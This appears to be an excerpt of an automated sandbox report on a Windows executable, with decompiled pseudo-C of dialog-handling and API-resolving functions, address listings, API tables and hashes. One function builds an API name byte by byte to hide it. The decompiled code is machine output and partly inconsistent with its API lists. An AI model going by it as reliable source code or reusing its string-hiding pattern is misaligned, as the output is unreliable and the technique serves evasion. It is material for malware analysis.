												_t198 = _t152;
												__eflags = _t198;
												if(_t198 == 0) {
													L62:
													_t199 = E00416BC9(_v36, _t240);
													__eflags = _v32 - 0x102;
													if(_v32 != 0x102) {
														L64:
														_t232 =  *(_t240 + 8) & 0x0000ffff;
														__eflags = _t232 - 9;
														if(_t232 != 9) {
															L66:
															__eflags = _t232 - 0x20;
															if(__eflags == 0) {
																goto L54;
															} else {
																_push(_t240);
																_t200 = E004172BC(_t229, _t232, _t236, _t240, _t251, __eflags, _a4, _v36);
																__eflags = _t200;
																if(_t200 == 0) {
																	goto L75;
																} else {
																	_t201 =  *(_t200 + 4);
																	__eflags = _t201;
																	if(_t201 == 0) {
																		goto L75;
																	} else {
																		_t232 = _t201;
																		E004111F7(_t201, _t240);
																		L125:
																		_v28 = 1;
																	}
																}
																goto L79;
															}
														} else {
															__eflags = _t199 & 0x00000002;
															if((_t199 & 0x00000002) != 0) {
																goto L75;
															} else {
																goto L66;
															}
														}
													} else {
														__eflags = _t199 & 0x00000084;
														if((_t199 & 0x00000084) != 0) {
															goto L75;
														} else {
															goto L64;
														}
													}
												} else {
													__eflags = _t198 != 4;
													if(_t198 != 4) {
														L75:
														_t154 = _a4;
														__eflags =  *(_t154 + 0x3c) & 0x00001000;
														if(( *(_t154 + 0x3c) & 0x00001000) == 0) {
															_t165 = IsDialogMessageA( *(_t154 + 0x20), _a8);
															__eflags = _t165;
															_v28 = _t165;
															if(_t165 != 0) {
																_t167 = E0040A17C(_t229, _t236, _t260, GetFocus());
																__eflags = _t167 - _v24;
																if(_t167 != _v24) {
																	E00416E1E(_t232, E0040A17C(_t229, _t236, _t260, GetFocus()));
																	_pop(_t232);
																}
															}
														}
														L79:
														_t155 = IsWindow(_v52);
														__eflags = _t155;
														if(_t155 != 0) {
															E00416E8B(_t229, _t232, _t236, _t260, _v24, E0040A17C(_t229, _t236, _t260, GetFocus()));
															_t161 = IsWindow(_v48);
															__eflags = _t161;
															if(_t161 != 0) {
																E00417039(_t236, _a4, _v24, E0040A17C(_t229, _t236, _t260, GetFocus()));
															}
														}
														_t156 = _v28;
													} else {
														__eflags = _v24;
														if(_v24 != 0) {
															L61:
															__eflags =  *(_t240 + 8) - 0x20;
															if( *(_t240 + 8) == 0x20) {
																goto L75;
															} else {
																goto L62;
															}
														} else {
															_t204 = GetKeyState(0x12);
															__eflags = _t204;
															if(_t204 >= 0) {
																goto L75;
															} else {
																goto L61;
															}
														}
													}
												}
											}
										} else {
											_t256 = _t149;
											while(1) {
												__eflags =  *(_t256 + 0x50);
												if( *(_t256 + 0x50) != 0) {
													break;
												}
												_t211 = E0040A17C(_t229, _t236, _t260, GetParent( *(_t256 + 0x20)));
												__eflags = _t211 - _a4;
												if(_t211 != _a4) {
													_t256 = E0040A17C(_t229, _t236, _t260, GetParent( *(_t256 + 0x20)));
													__eflags = _t256;
													if(_t256 != 0) {
														continue;
													}
												}
												break;
											}
											__eflags = _t256;
											if(_t256 == 0) {
												L45:
												__eflags = _v32 - 0x101;
												if(_v32 == 0x101) {
													L48:
													__eflags = _t256;
													if(_t256 == 0) {
														goto L55;
													} else {
														_t257 =  *(_t256 + 0x50);
														__eflags = _t257;
														if(_t257 == 0) {
															goto L55;
														} else {
															_t206 = _a8->wParam & 0x0000ffff;
															__eflags = _t206 - 0xd;
															if(_t206 != 0xd) {
																L52:
																__eflags = _t206 - 0x1b;
																if(_t206 != 0x1b) {
																	goto L55;
																} else {
																	__eflags =  *(_t257 + 0x84) & 0x00000002;
																	if(( *(_t257 + 0x84) & 0x00000002) == 0) {
																		goto L55;
																	} else {
																		goto L54;
																	}
																}
															} else {
																__eflags =  *(_t257 + 0x84) & 0x00000001;
																if(( *(_t257 + 0x84) & 0x00000001) != 0) {
																	L54:
																	_t156 = 0;
																} else {
																	goto L52;
																}
															}
														}
													}
												} else {
													__eflags = _v32 - _t229;
													if(_v32 == _t229) {
														goto L48;
													} else {
														__eflags = _v32 - 0x102;
														if(_v32 != 0x102) {
															L55:
															_t240 = _a8;
															goto L56;
														} else {
															goto L48;
														}
													}
												}
											} else {
												_t207 =  *(_t256 + 0x50);
												__eflags = _t207;
												if(_t207 == 0) {
													goto L45;
												} else {
													__eflags =  *(_t207 + 0x58);
													if( *(_t207 + 0x58) == 0) {
														goto L45;
													} else {
														_t208 =  *(_t207 + 0x58);
														_t232 =  *_t208;
														_t209 =  *((intOrPtr*)( *_t208 + 0x14))(_t208, _a8);
														__eflags = _t209;
														if(_t209 != 0) {
															goto L45;
														} else {
															_t156 = _t209 + 1;
														}
													}
												}
											}
										}
									} else {
										goto L34;
									}
								}
								return E0041EA59(_t156);
							} else {
								_t232 =  *(_t238 + 4);
								_t215 =  *((intOrPtr*)( *( *(_t238 + 4)) + 0x78))();
								__eflags = _t215 & 0x08000000;
								if((_t215 & 0x08000000) == 0) {
									goto L20;
								} else {
									goto L23;
								}
							}
						} else {
							_t216 =  *(_t238 + 4);
							if(_t216 == 0) {
								_t217 =  *_t238;
							} else {
								_t217 =  *(_t216 + 0x24);
							}
							if(_t217 == 0) {
								goto L21;
							} else {
								if(IsWindowEnabled(_t217) == 0) {
									L23:
									__eflags = _t238 - _v8;
									if(_t238 == _v8) {
										break;
									} else {
										__eflags = _v8;
										if(_v8 == 0) {
											_v8 = _t238;
										}
										_t247 = _t247 + 1;
										__eflags = _t247 - 0x200;
										if(_t247 < 0x200) {
											continue;
										} else {
											break;
										}
									}
								} else {
									L20:
									_t141 = _t238;
									L28:
									return _t141;
								}
							}
						}
					} else {
						_t232 = _a4;
						_t238 = E0040D187(_a4, _t236, _t238, 0);
						if(_t238 == 0) {
							break;
						} else {
							goto L14;
						}
					}
					L126:
				}
				_t141 = 0;
				__eflags = 0;
				goto L28;
			}




































































                                                                                                                            0x004172bc
                                                                                                                            0x004172bc
                                                                                                                            0x004172bd
                                                                                                                            0x004172bf
                                                                                                                            0x004172c0
                                                                                                                            0x004172c4
                                                                                                                            0x004172c5
                                                                                                                            0x004172c6
                                                                                                                            0x004172cd
                                                                                                                            0x004172d2
                                                                                                                            0x004172d6
                                                                                                                            0x004172d8
                                                                                                                            0x004172e0
                                                                                                                            0x004172e4
                                                                                                                            0x004172e6
                                                                                                                            0x004172eb
                                                                                                                            0x004172ee
                                                                                                                            0x004172f0
                                                                                                                            0x004172f4
                                                                                                                            0x004172f4
                                                                                                                            0x004172fc
                                                                                                                            0x004172fe
                                                                                                                            0x00417303
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0041730d
                                                                                                                            0x0041731d
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0041731f
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0041730d
                                                                                                                            0x00417321
                                                                                                                            0x00417321
                                                                                                                            0x004172ee
                                                                                                                            0x004172e4
                                                                                                                            0x00417323
                                                                                                                            0x00417323
                                                                                                                            0x00417325
                                                                                                                            0x00417331
                                                                                                                            0x00417337
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0041733a
                                                                                                                            0x00417341
                                                                                                                            0x00417342
                                                                                                                            0x00417354
                                                                                                                            0x00417356
                                                                                                                            0x00417379
                                                                                                                            0x00417379
                                                                                                                            0x0041737c
                                                                                                                            0x004173ac
                                                                                                                            0x004173b1
                                                                                                                            0x004173b2
                                                                                                                            0x004173b9
                                                                                                                            0x004173be
                                                                                                                            0x004173c1
                                                                                                                            0x004173c3
                                                                                                                            0x004173cd
                                                                                                                            0x004173c5
                                                                                                                            0x004173c5
                                                                                                                            0x004173c5
                                                                                                                            0x004173d0
                                                                                                                            0x004173d3
                                                                                                                            0x004173d6
                                                                                                                            0x004173e0
                                                                                                                            0x004173e3
                                                                                                                            0x004173e8
                                                                                                                            0x004173ed
                                                                                                                            0x004173ef
                                                                                                                            0x004173f2
                                                                                                                            0x004173fc
                                                                                                                            0x00417402
                                                                                                                            0x00417405
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004173f4
                                                                                                                            0x004173f4
                                                                                                                            0x004173fa
                                                                                                                            0x0041740b
                                                                                                                            0x0041740b
                                                                                                                            0x0041740d
                                                                                                                            0x004174ba
                                                                                                                            0x004174bc
                                                                                                                            0x004174be
                                                                                                                            0x004174c1
                                                                                                                            0x004174c6
                                                                                                                            0x004174c9
                                                                                                                            0x004174cf
                                                                                                                            0x004174cf
                                                                                                                            0x004174d1
                                                                                                                            0x004174d8
                                                                                                                            0x00417562
                                                                                                                            0x00417567
                                                                                                                            0x0041756b
                                                                                                                            0x0041756e
                                                                                                                            0x004176ab
                                                                                                                            0x004176ae
                                                                                                                            0x00000000
                                                                                                                            0x004176b4
                                                                                                                            0x004176b4
                                                                                                                            0x004176b7
                                                                                                                            0x00417767
                                                                                                                            0x00000000
                                                                                                                            0x004176bd
                                                                                                                            0x004176bd
                                                                                                                            0x004176c0
                                                                                                                            0x0041776e
                                                                                                                            0x00417772
                                                                                                                            0x00417777
                                                                                                                            0x00417779
                                                                                                                            0x00000000
                                                                                                                            0x0041777f
                                                                                                                            0x0041777f
                                                                                                                            0x00417783
                                                                                                                            0x00417786
                                                                                                                            0x00417788
                                                                                                                            0x00417791
                                                                                                                            0x0041778a
                                                                                                                            0x0041778a
                                                                                                                            0x0041778a
                                                                                                                            0x00417796
                                                                                                                            0x00417798
                                                                                                                            0x0041779a
                                                                                                                            0x00000000
                                                                                                                            0x004177a0
                                                                                                                            0x004177a0
                                                                                                                            0x004177a4
                                                                                                                            0x004177a6
                                                                                                                            0x004177aa
                                                                                                                            0x004177aa
                                                                                                                            0x004177af
                                                                                                                            0x004177b3
                                                                                                                            0x004177c3
                                                                                                                            0x004177c5
                                                                                                                            0x004177c7
                                                                                                                            0x004177d4
                                                                                                                            0x004177da
                                                                                                                            0x004177c9
                                                                                                                            0x004177ca
                                                                                                                            0x004177ca
                                                                                                                            0x004177df
                                                                                                                            0x004177e1
                                                                                                                            0x004177e3
                                                                                                                            0x00000000
                                                                                                                            0x004177e9
                                                                                                                            0x004177ef
                                                                                                                            0x004177f2
                                                                                                                            0x004177f5
                                                                                                                            0x004177fa
                                                                                                                            0x004177fd
                                                                                                                            0x0041780a
                                                                                                                            0x0041780a
                                                                                                                            0x00000000
                                                                                                                            0x004177fd
                                                                                                                            0x004177b5
                                                                                                                            0x004177b5
                                                                                                                            0x004177bb
                                                                                                                            0x00000000
                                                                                                                            0x004177bb
                                                                                                                            0x004177b3
                                                                                                                            0x0041779a
                                                                                                                            0x004176c6
                                                                                                                            0x004176c6
                                                                                                                            0x004176c9
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004176c9
                                                                                                                            0x004176c0
                                                                                                                            0x004176b7
                                                                                                                            0x00000000
                                                                                                                            0x00417574
                                                                                                                            0x00417574
                                                                                                                            0x00417703
                                                                                                                            0x00417703
                                                                                                                            0x00417703
                                                                                                                            0x00000000
                                                                                                                            0x0041757a
                                                                                                                            0x0041757a
                                                                                                                            0x0041757d
                                                                                                                            0x00000000
                                                                                                                            0x00417583
                                                                                                                            0x00417583
                                                                                                                            0x00417586
                                                                                                                            0x00417625
                                                                                                                            0x00417627
                                                                                                                            0x00000000
                                                                                                                            0x0041762d
                                                                                                                            0x0041762f
                                                                                                                            0x00417635
                                                                                                                            0x0041763a
                                                                                                                            0x0041763d
                                                                                                                            0x00417640
                                                                                                                            0x00417645
                                                                                                                            0x0041764a
                                                                                                                            0x0041764c
                                                                                                                            0x00000000
                                                                                                                            0x00417652
                                                                                                                            0x00417652
                                                                                                                            0x00417656
                                                                                                                            0x0041766b
                                                                                                                            0x0041766d
                                                                                                                            0x0041766f
                                                                                                                            0x0041767d
                                                                                                                            0x0041767f
                                                                                                                            0x00417671
                                                                                                                            0x00417672
                                                                                                                            0x00417672
                                                                                                                            0x00417684
                                                                                                                            0x00417686
                                                                                                                            0x00417688
                                                                                                                            0x00417691
                                                                                                                            0x00417696
                                                                                                                            0x0041769f
                                                                                                                            0x004176a5
                                                                                                                            0x004176a5
                                                                                                                            0x00417658
                                                                                                                            0x00417658
                                                                                                                            0x0041765b
                                                                                                                            0x0041765e
                                                                                                                            0x00417660
                                                                                                                            0x00417660
                                                                                                                            0x00000000
                                                                                                                            0x00417656
                                                                                                                            0x0041764c
                                                                                                                            0x00000000
                                                                                                                            0x0041758c
                                                                                                                            0x0041758c
                                                                                                                            0x0041758f
                                                                                                                            0x004176cf
                                                                                                                            0x004176cf
                                                                                                                            0x004176d1
                                                                                                                            0x00000000
                                                                                                                            0x004176d7
                                                                                                                            0x004176da
                                                                                                                            0x004176df
                                                                                                                            0x004176e1
                                                                                                                            0x004176e2
                                                                                                                            0x004176f3
                                                                                                                            0x004176e4
                                                                                                                            0x004176e4
                                                                                                                            0x004176e7
                                                                                                                            0x004176e9
                                                                                                                            0x004176e9
                                                                                                                            0x004176f8
                                                                                                                            0x004176fa
                                                                                                                            0x004176fc
                                                                                                                            0x004176ff
                                                                                                                            0x0041771a
                                                                                                                            0x0041771a
                                                                                                                            0x0041771c
                                                                                                                            0x00417721
                                                                                                                            0x00417723
                                                                                                                            0x00417731
                                                                                                                            0x00417734
                                                                                                                            0x00000000
                                                                                                                            0x0041773a
                                                                                                                            0x0041773a
                                                                                                                            0x0041773b
                                                                                                                            0x0041773c
                                                                                                                            0x0041773d
                                                                                                                            0x0041773f
                                                                                                                            0x00417744
                                                                                                                            0x00417745
                                                                                                                            0x00417748
                                                                                                                            0x00417750
                                                                                                                            0x00000000
                                                                                                                            0x00417750
                                                                                                                            0x00417725
                                                                                                                            0x00417726
                                                                                                                            0x00000000
                                                                                                                            0x00417726
                                                                                                                            0x00417701
                                                                                                                            0x00417705
                                                                                                                            0x00417710
                                                                                                                            0x00417712
                                                                                                                            0x00417714
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00417714
                                                                                                                            0x004176ff
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0041758f
                                                                                                                            0x00417586
                                                                                                                            0x0041757d
                                                                                                                            0x00417574
                                                                                                                            0x00000000
                                                                                                                            0x004174de
                                                                                                                            0x004174df
                                                                                                                            0x004174df
                                                                                                                            0x004174e0
                                                                                                                            0x0041750c
                                                                                                                            0x00417510
                                                                                                                            0x00417515
                                                                                                                            0x0041751c
                                                                                                                            0x00417522
                                                                                                                            0x00417522
                                                                                                                            0x00417526
                                                                                                                            0x0041752a
                                                                                                                            0x00417530
                                                                                                                            0x00417530
                                                                                                                            0x00417534
                                                                                                                            0x00000000
                                                                                                                            0x0041753a
                                                                                                                            0x0041753a
                                                                                                                            0x00417541
                                                                                                                            0x00417546
                                                                                                                            0x00417548
                                                                                                                            0x00000000
                                                                                                                            0x0041754a
                                                                                                                            0x0041754a
                                                                                                                            0x0041754d
                                                                                                                            0x0041754f
                                                                                                                            0x00000000
                                                                                                                            0x00417551
                                                                                                                            0x00417552
                                                                                                                            0x00417554
                                                                                                                            0x00417810
                                                                                                                            0x00417810
                                                                                                                            0x00417810
                                                                                                                            0x0041754f
                                                                                                                            0x00000000
                                                                                                                            0x00417548
                                                                                                                            0x0041752c
                                                                                                                            0x0041752c
                                                                                                                            0x0041752e
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0041752e
                                                                                                                            0x0041751e
                                                                                                                            0x0041751e
                                                                                                                            0x00417520
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00417520
                                                                                                                            0x004174e2
                                                                                                                            0x004174e2
                                                                                                                            0x004174e5
                                                                                                                            0x00417595
                                                                                                                            0x00417595
                                                                                                                            0x00417598
                                                                                                                            0x0041759e
                                                                                                                            0x004175a6
                                                                                                                            0x004175ac
                                                                                                                            0x004175ae
                                                                                                                            0x004175b1
                                                                                                                            0x004175bc
                                                                                                                            0x004175c1
                                                                                                                            0x004175c4
                                                                                                                            0x004175cf
                                                                                                                            0x004175d4
                                                                                                                            0x004175d4
                                                                                                                            0x004175c4
                                                                                                                            0x004175b1
                                                                                                                            0x004175d5
                                                                                                                            0x004175de
                                                                                                                            0x004175e0
                                                                                                                            0x004175e2
                                                                                                                            0x004175f6
                                                                                                                            0x00417600
                                                                                                                            0x00417602
                                                                                                                            0x00417604
                                                                                                                            0x00417615
                                                                                                                            0x00417615
                                                                                                                            0x00417604
                                                                                                                            0x0041761a
                                                                                                                            0x004174eb
                                                                                                                            0x004174eb
                                                                                                                            0x004174ee
                                                                                                                            0x00417501
                                                                                                                            0x00417501
                                                                                                                            0x00417506
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004174f0
                                                                                                                            0x004174f2
                                                                                                                            0x004174f8
                                                                                                                            0x004174fb
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004174fb
                                                                                                                            0x004174ee
                                                                                                                            0x004174e5
                                                                                                                            0x004174e0
                                                                                                                            0x00417413
                                                                                                                            0x00417419
                                                                                                                            0x0041741b
                                                                                                                            0x0041741b
                                                                                                                            0x0041741f
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00417427
                                                                                                                            0x0041742c
                                                                                                                            0x0041742f
                                                                                                                            0x0041743c
                                                                                                                            0x0041743e
                                                                                                                            0x00417440
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00417440
                                                                                                                            0x00000000
                                                                                                                            0x0041742f
                                                                                                                            0x00417442
                                                                                                                            0x00417444
                                                                                                                            0x00417469
                                                                                                                            0x00417469
                                                                                                                            0x00417470
                                                                                                                            0x00417480
                                                                                                                            0x00417480
                                                                                                                            0x00417482
                                                                                                                            0x00000000
                                                                                                                            0x00417484
                                                                                                                            0x00417484
                                                                                                                            0x00417487
                                                                                                                            0x00417489
                                                                                                                            0x00000000
                                                                                                                            0x0041748b
                                                                                                                            0x0041748e
                                                                                                                            0x00417492
                                                                                                                            0x00417496
                                                                                                                            0x004174a1
                                                                                                                            0x004174a1
                                                                                                                            0x004174a5
                                                                                                                            0x00000000
                                                                                                                            0x004174a7
                                                                                                                            0x004174a7
                                                                                                                            0x004174ae
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004174ae
                                                                                                                            0x00417498
                                                                                                                            0x00417498
                                                                                                                            0x0041749f
                                                                                                                            0x004174b0
                                                                                                                            0x004174b0
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0041749f
                                                                                                                            0x00417496
                                                                                                                            0x00417489
                                                                                                                            0x00417472
                                                                                                                            0x00417472
                                                                                                                            0x00417475
                                                                                                                            0x00000000
                                                                                                                            0x00417477
                                                                                                                            0x00417477
                                                                                                                            0x0041747e
                                                                                                                            0x004174b7
                                                                                                                            0x004174b7
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0041747e
                                                                                                                            0x00417475
                                                                                                                            0x00417446
                                                                                                                            0x00417446
                                                                                                                            0x00417449
                                                                                                                            0x0041744b
                                                                                                                            0x00000000
                                                                                                                            0x0041744d
                                                                                                                            0x0041744d
                                                                                                                            0x00417451
                                                                                                                            0x00000000
                                                                                                                            0x00417453
                                                                                                                            0x00417453
                                                                                                                            0x00417459
                                                                                                                            0x0041745c
                                                                                                                            0x0041745f
                                                                                                                            0x00417461
                                                                                                                            0x00000000
                                                                                                                            0x00417463
                                                                                                                            0x00417463
                                                                                                                            0x00417463
                                                                                                                            0x00417461
                                                                                                                            0x00417451
                                                                                                                            0x0041744b
                                                                                                                            0x00417444
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004173fa
                                                                                                                            0x00417622
                                                                                                                            0x0041737e
                                                                                                                            0x0041737e
                                                                                                                            0x00417383
                                                                                                                            0x00417386
                                                                                                                            0x0041738b
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0041738b
                                                                                                                            0x00417358
                                                                                                                            0x00417358
                                                                                                                            0x0041735d
                                                                                                                            0x00417364
                                                                                                                            0x0041735f
                                                                                                                            0x0041735f
                                                                                                                            0x0041735f
                                                                                                                            0x00417368
                                                                                                                            0x00000000
                                                                                                                            0x0041736a
                                                                                                                            0x00417373
                                                                                                                            0x0041738d
                                                                                                                            0x0041738d
                                                                                                                            0x00417390
                                                                                                                            0x00000000
                                                                                                                            0x00417392
                                                                                                                            0x00417392
                                                                                                                            0x00417395
                                                                                                                            0x00417397
                                                                                                                            0x00417397
                                                                                                                            0x0041739a
                                                                                                                            0x0041739b
                                                                                                                            0x004173a1
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004173a1
                                                                                                                            0x00417375
                                                                                                                            0x00417375
                                                                                                                            0x00417375
                                                                                                                            0x004173a5
                                                                                                                            0x004173a9
                                                                                                                            0x004173a9
                                                                                                                            0x00417373
                                                                                                                            0x00417368
                                                                                                                            0x00417344
                                                                                                                            0x00417344
                                                                                                                            0x0041734e
                                                                                                                            0x00417352
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00417352
                                                                                                                            0x00000000
                                                                                                                            0x00417342
                                                                                                                            0x004173a3
                                                                                                                            0x004173a3
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            • GetFocus.USER32(?), ref: 0041730F
                                                                                                                            • IsWindowEnabled.USER32(?), ref: 0041736B
                                                                                                                            • __EH_prolog3_catch.LIBCMT ref: 004173B9
                                                                                                                            • GetFocus.USER32(00000028), ref: 004173D9
                                                                                                                            • GetParent.USER32(?), ref: 00417424
                                                                                                                            • GetParent.USER32(?), ref: 00417434
                                                                                                                            • GetKeyState.USER32(00000012), ref: 004174F2
                                                                                                                            • IsDialogMessageA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004175A6
                                                                                                                            • GetFocus.USER32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 004175B9
                                                                                                                            • GetFocus.USER32(00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004175C6
                                                                                                                            • IsWindow.USER32(?), ref: 004175DE
                                                                                                                            • GetFocus.USER32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 004175EA
                                                                                                                            • IsWindow.USER32(?), ref: 00417600
                                                                                                                            • GetFocus.USER32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00417606
                                                                                                                            • GetKeyState.USER32(00000010), ref: 0041762F
                                                                                                                            • MessageBeep.USER32(00000000), ref: 00417726
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Focus$Window$MessageParentState$BeepDialogEnabledH_prolog3_catch
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 656273425-0
                                                                                                                            • Opcode ID: d58eab7313acf6ae0b4ff30705d635704e15d34f9847d0ab710fa406ac79184b
                                                                                                                            • Instruction ID: 91d72c0e5d5a089f5decdfed447952135673fe792e8601e6902122b101c7795d
                                                                                                                            • Opcode Fuzzy Hash: d58eab7313acf6ae0b4ff30705d635704e15d34f9847d0ab710fa406ac79184b
                                                                                                                            • Instruction Fuzzy Hash: B5F1B231908205ABDF21AF65C844BEF7BB5AF44354F14402BE815AB2A1DB3CDDC1DB99
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00401580 Relevance: 19.3, APIs: 3, Strings: 8, Instructions: 38libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 90%
                                                                                                                            			E00401580(struct HINSTANCE__** __esi) {
				signed int _v4;
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				void* __edi;
				signed int _t16;
				void* _t26;
				void* _t30;

				_t33 =  &_v16;
				_t16 =  *0x441590; // 0x4917eadc
				_v4 = _t16 ^  &_v16;
				_v14 = 0x74;
				_v10 = 0x74;
				_v16 = 0x6c;
				_v15 = 0x73;
				_v13 = 0x72;
				_v12 = 0x63;
				_v11 = 0x61;
				_v9 = 0x57;
				_v8 = 0;
				__esi[0xc] = GetProcAddress( *__esi,  &_v16);
				__esi[8] = GetProcAddress( *__esi, "GetEnvironmentVariableW");
				__esi[0xb] = GetProcAddress( *__esi, "CloseHandle");
				return E0041D773(_t24, _t26, _v4 ^ _t33, _t30, GetProcAddress, __esi);
			}

















                                                                                                                            0x00401580
                                                                                                                            0x00401583
                                                                                                                            0x0040158a
                                                                                                                            0x0040159b
                                                                                                                            0x0040159f
                                                                                                                            0x004015a7
                                                                                                                            0x004015ac
                                                                                                                            0x004015b1
                                                                                                                            0x004015b6
                                                                                                                            0x004015bb
                                                                                                                            0x004015c0
                                                                                                                            0x004015c5
                                                                                                                            0x004015cc
                                                                                                                            0x004015d9
                                                                                                                            0x004015ed
                                                                                                                            0x004015f8

                                                                                                                            APIs
                                                                                                                            • GetProcAddress.KERNEL32 ref: 004015CA
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetEnvironmentVariableW), ref: 004015D7
                                                                                                                            • GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 004015E4
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc
                                                                                                                            • String ID: CloseHandle$GetEnvironmentVariableW$W$a$c$l$r$s
                                                                                                                            • API String ID: 190572456-264146159
                                                                                                                            • Opcode ID: f8af973712a27628de956ae7555a9dc86780c33be5c449d72489509ecb44338b
                                                                                                                            • Instruction ID: 3e4fdce79e8347c62340b30d642ca91cc1eef418a48f95a256832fb5cf532157
                                                                                                                            • Opcode Fuzzy Hash: f8af973712a27628de956ae7555a9dc86780c33be5c449d72489509ecb44338b
                                                                                                                            • Instruction Fuzzy Hash: 11014C6050C380AED300EF7CC805A5BFBD5AFA9604F448C5EF4D883252D7B9A508CB67
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004067F4 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 28libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E004067F4(void* __eax, void* __ecx, void* __edx, void* __esi, intOrPtr _a100) {
				void* _v8;
				void* _t15;

				_t15 = __ecx;
				_a100 = _a100 + __edx;
			}





                                                                                                                            0x004067f4
                                                                                                                            0x004067f9

                                                                                                                            APIs
                                                                                                                            • GetModuleHandleA.KERNEL32(KERNEL32), ref: 00406801
                                                                                                                            • GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 00406822
                                                                                                                            • GetProcAddress.KERNEL32(ReleaseActCtx), ref: 00406834
                                                                                                                            • GetProcAddress.KERNEL32(ActivateActCtx), ref: 00406846
                                                                                                                            • GetProcAddress.KERNEL32(DeactivateActCtx), ref: 00406858
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
